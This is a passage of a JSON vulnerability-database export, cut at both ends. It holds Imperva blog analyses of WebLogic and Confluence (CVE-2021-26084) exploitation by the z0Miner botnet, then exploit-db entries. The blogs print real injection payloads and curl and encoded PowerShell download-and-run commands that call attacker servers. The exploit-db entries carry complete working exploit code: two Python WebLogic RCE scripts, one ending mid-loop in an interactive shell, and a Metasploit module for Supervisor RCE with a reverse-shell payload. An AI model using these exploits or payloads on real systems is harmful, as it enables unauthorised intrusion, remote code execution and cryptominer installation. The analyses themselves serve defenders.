common method - \u201cspray and pray\u201d. They send exploits to multiple targets in a hope that one of the systems is vulnerable and it will trigger the payload. \nThe payload used is an out-of-band communication channel like DNS and HTTP. \nIn the payload, you can see the use of \u201cburp collaborator\u201d and \u201crequestbin.net\u201d. \nBoth services allow receiving a DNS query triggered by the payload.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/oob_weblogic_blured.jpg>)\n\n## Conclusion\n\nIt\u2019s not only malicious actors that try to exploit vulnerabilities - but also people who want to make companies more secure. \nWe\u2019re constantly on the lookout for new vulnerabilities to make sure our customers are protected. \nImperva WAF has different security mechanisms to detect zero-day attacks. In the case of WebLogic RCE CVE-2020\u201314882, the attacks were detected and blocked out of the box.\n\nThe post [Bug hunting for a quick buck using WebLogic vulnerability (CVE-2020\u201314882)](<https://www.imperva.com/blog/bug-hunting-for-a-quick-buck-using-weblogic-vulnerability-cve-2020-14882/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-02T15:47:04", "type": "impervablog", "title": "Bug hunting for a quick buck using WebLogic vulnerability (CVE-2020\u201314882)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-11-02T15:47:04", "id": "IMPERVABLOG:1DB28979DC434D618FB773C7834FB207", "href": "https://www.imperva.com/blog/bug-hunting-for-a-quick-buck-using-weblogic-vulnerability-cve-2020-14882/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of an insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.\n\nSoon after the publication, various POC/Exploits were published online - at the time of writing this blog there are 32 Github repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above we were able to detect payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker is using the same methodology in exploiting a vulnerable Confluence Server.\n\n * Attacker 
determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&C server, and writes them into a writable location on the affected system (under /tmp on Linux and $env:TMP system variable on Windows).\n * Executing downloaded dropper scripts.\n * Dropper Scripts perform the following actions to download, install and execute the XMRig crypto mining files: \n * Removal of competing crypto mining processes and their related files.\n * Establishing persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager') .newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \nvar cmd = new java.lang.String("curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\nFrom the sample above we see the attacker is attempting to determine the vulnerable server operating system by calling java.lang.System.getProperty("os.name"):\n\nOnce the operating system is determined, a file is downloaded from a remote source by either using 
curl as can be seen in the example above or by powershell:\n\nDownload of a Linux Shell dropper script: \nvar cmd = new java.lang.String("**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**");\n\nDownload of a Windows Powershell dropper script: \nvar cmd = new java.lang.String(**"powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo \nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw \nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="**);\n\nThe powershell payload is base64 encoded, thus decoded into the following code which downloads the sys.ps1 file: \nIEX (New-Object System.Net.Webclient).DownloadString('[hxxp://27.1.1.34:8080/docs/s/sys.ps1](<8080/docs/s/sys.ps1>)')\n\nShell Dropper scripts: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/26084.txt](<http://27.1.1.34:8080/docs/s/26084.txt>) -o /tmp/.solrg \nPost-exploitation linked clean up scripts that remove all traces of the dropper script mentioned above: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kg.txt](<8080/docs/s/kg.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kk.txt](<8080/docs/s/kk.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kill.sh](<8080/docs/s/kk.txt>) -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using the similar payload found in the vulnerable querystring parameter shown above.\n\nBelow is one example where again the attacker is using different code execution command based on the affected server operating system detected: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager \n').newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \n**var cmd = new java.lang.String("bash /tmp/.solrg**");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", 
"/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\n### Dropper Script Analysis\n\nAs mentioned earlier, the first part of the dropper scripts are performing the removal of competing crypto mining processes and their related files.\n\nOn Linux systems:\n\nOn Windows systems:\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malwares (pastebin).\n\nOn Linux systems:\n\nOn Windows systems:\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nAnd finally, the script starting the XMRig mining and execution of post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script which in turn executes solrd, which is the XMRig Miner file that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (function Update($url,$path,$proc_name) that performs file downloads using the WebClient.DownloadFile 
Method using a System.Net.WebClient object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = "hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe" \n$miner_name = "javae" \n$miner_path = "$env:TMP\\javae.exe" \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = "hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json" \n$miner_cfg_name = "config.json" \n$miner_cfg_path = "$env:TMP\\config.json" \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = "hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat" \n$killmodule_name = "clean.bat" \n$killmodule_path = "$env:TMP\\clean.bat" \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders. \nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to the said function. \nNext it sets the System File, Hidden File and Read-Only attributes for the newly downloaded miner files, and starts the miner process.\n\nLast step is executing the clean-up batch script, and termination of the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTP (tactics, techniques, procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed including downloaders, payloads, configuration, C&C servers and more, we identified a known threat actor that is tied to previous attack campaigns going back as far as March 2021.\n\nThe C&C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet. 
\nz0Miner is a malicious mining family that became active last year and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the same methodology as mentioned earlier to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IOT Botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing crypto currency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 publicly published, the Imperva Threat Research team immediately began their research on creating a mitigation. 
It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-18T10:52:50", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T00:00:00", "type": "exploitdb", "title": "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-10-29T00:00:00", "id": "EDB-ID:48971", "href": "https://www.exploit-db.com/exploits/48971", "sourceData": "#!/usr/bin/python3\r\n\r\n# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request\r\n# Exploit Author: Nguyen Jang\r\n# CVE: CVE-2020-14882\r\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n\r\n# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf\r\n\r\nimport requests\r\nimport sys\r\n\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\n\r\nif len(sys.argv) != 3:\r\n print(\"[+] WebLogic Unauthenticated RCE via GET request\")\r\n print(\"[+] Usage : python3 exploit.py 
http(s)://target:7001 command\")\r\n print(\"[+] Example1 : python3 exploit.py http(s)://target:7001 \\\"nslookup your_Domain\\\"\")\r\n print(\"[+] Example2 : python3 exploit.py http(s)://target:7001 \\\"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\\\"\")\r\n exit()\r\n\r\ntarget = sys.argv[1]\r\ncommand = sys.argv[2]\r\n\r\nrequest = requests.session()\r\nheaders = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}\r\n\r\nprint(\"[+] Sending GET Request ....\")\r\n\r\nGET_Request = request.get(target + \"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec('\" + command + \"');\\\");\", verify=False, headers=headers)\r\n\r\nprint(\"[+] Done !!\")", "sourceHref": "https://www.exploit-db.com/raw/48971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-25T21:05:00", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-25T00:00:00", "type": "exploitdb", "title": "Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2017-11610", "CVE-2017-11610"], "modified": "2017-09-25T00:00:00", "id": "EDB-ID:42779", "href": "https://www.exploit-db.com/exploits/42779", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Supervisor XML-RPC Authenticated Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\r\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\r\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\r\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\r\n configured to run an HTTP server without authentication. 
This vulnerability affects versions 3.0a1 to 3.3.2.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Calum Hutton <c.e.hutton@gmx.com>'\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],\r\n ['URL', 'https://www.debian.org/security/2017/dsa-3942'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],\r\n ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],\r\n ['CVE', '2017-11610']\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n ['3.0a1-3.3.2', {}]\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 9001,\r\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 19 2017',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9001),\r\n OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),\r\n OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),\r\n OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),\r\n ]\r\n )\r\n end\r\n\r\n def check_version(version)\r\n if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def check\r\n\r\n print_status('Extracting version from web interface..')\r\n\r\n params = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('/')\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? 
and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n res = send_request_cgi(params)\r\n\r\n if res\r\n if res.code == 200\r\n match = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/)\r\n if match\r\n version = Gem::Version.new(match[1])\r\n if check_version(version)\r\n print_good(\"Vulnerable version found: #{version}\")\r\n return Exploit::CheckCode::Appears\r\n else\r\n print_bad(\"Version #{version} is not vulnerable\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_bad('Could not extract version number from web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n elsif res.code == 401\r\n print_bad(\"Authentication failed: #{res.code} response\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n print_bad(\"Unexpected HTTP code: #{res.code} response\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n else\r\n print_bad('Error connecting to web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n\r\n # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server\r\n # Credit to the following urls for the os.system() payload\r\n # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610\r\n # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html\r\n xml_payload = %{<?xml version=\"1.0\"?>\r\n<methodCall>\r\n <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\r\n <params>\r\n <param>\r\n <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>\r\n </param>\r\n </params>\r\n</methodCall>}\r\n\r\n # Send the XML-RPC payload via POST to the specified endpoint\r\n endpoint_path = target_uri.path\r\n 
print_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\")\r\n\r\n params = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(endpoint_path),\r\n 'ctype' => 'text/xml',\r\n 'headers' => {'Accept' => 'text/xml'},\r\n 'data' => xml_payload,\r\n 'encode_params' => false\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n return send_request_cgi(params, timeout=5)\r\n\r\n end\r\n\r\n def exploit\r\n\r\n res = execute_cmdstager(:linemax => 800)\r\n\r\n if res\r\n if res.code == 401\r\n fail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\")\r\n elsif res.code == 404\r\n fail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\")\r\n end\r\n else\r\n print_good('Request returned without status code, usually indicates success. 
Passing to handler..')\r\n handler\r\n end\r\n\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/42779", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T17:18:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-14882", "CVE-2020-14882"], "modified": "2021-01-26T00:00:00", "id": "EDB-ID:49479", "href": "https://www.exploit-db.com/exploits/49479", "sourceData": "# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)\r\n# Google Dork: inurl:\"/console/login/LoginForm.jsp\"\r\n# Date: 01/26/2021\r\n# Exploit Author: CHackA0101\r\n# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html\r\n# Version: Oracle WebLogic Server, version 12.2.1.0\r\n# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)\r\n# Software Link: 
https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html\r\n# CVE : CVE-2020-14882\r\n\r\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport argparse\r\nimport http.client\r\nhttp.client.HTTPConnection._http_vsn=10\r\nhttp.client.HTTPConnection._http_vsn_str='HTTP/1.0'\r\nparse=argparse.ArgumentParser()\r\nparse.add_argument('-u','--url',help='url')\r\nargs=parse.parse_args()\r\n\r\nproxies={'http':'127.0.0.1:8080'}\r\ncmd_=\"\"\r\n\r\n# Headers\r\nheaders = {\r\n\t\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0\",\r\n\t\"Accept\":\"application/json,text/plain,*/*\",\r\n\t\"Accept-Language\":\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\r\n\t\"Accept-Encoding\":\"gzip,deflate\",\r\n\t\"Upgrade-Insecure-Requests\":\"1\",\r\n\t\"Content-Type\":\"application/x-www-form-urlencoded\",\r\n\t\"Cache-Control\":\"max-age=0\",\r\n\t\"Connection\":\"close\"\r\n}\r\n\r\n# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:\r\nurl=args.url+\"\"\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec();\");\"\"\"\r\nurl_=args.url+\"/console/images/%252E%252E%252Fconsole.portal\"\r\n\r\nform_data_=\"\"\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();\r\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\r\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\r\nfield.setAccessible(true);\r\nObject obj = field.get(adapter);\r\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) 
obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\r\nString cmd = req.getHeader(\"cmd\");\r\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\",\"/c\", cmd} : new String[]{\"/bin/sh\",\"-c\", cmd};\r\nif (cmd != null) {\r\n String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\\\A\").next();\r\n weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);\r\n res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\r\n res.getServletOutputStream().flush();\r\n res.getWriter().write(\"\");}executeThread.interrupt();\");\"\"\"\r\n\r\n#data_ = parse.urlencode(form_data_)\r\nresults1=requests.get(url,headers=headers)\r\n\r\nif results1.status_code==200:\r\n\tprint(\"(Load Headers...)\\n\")\r\n\tprint(\"(Data urlencode...)\\n\")\r\n\tprint(\"(Execute exploit...)\\n\")\r\n\tprint(\"(CHackA0101-GNU/Linux)$ Successful Exploitation.\\n\")\r\n\twhile True:\r\n\t\tcmd_test = input(\"(CHackA0101GNU/Linux)$ \")\r\n\t\tif 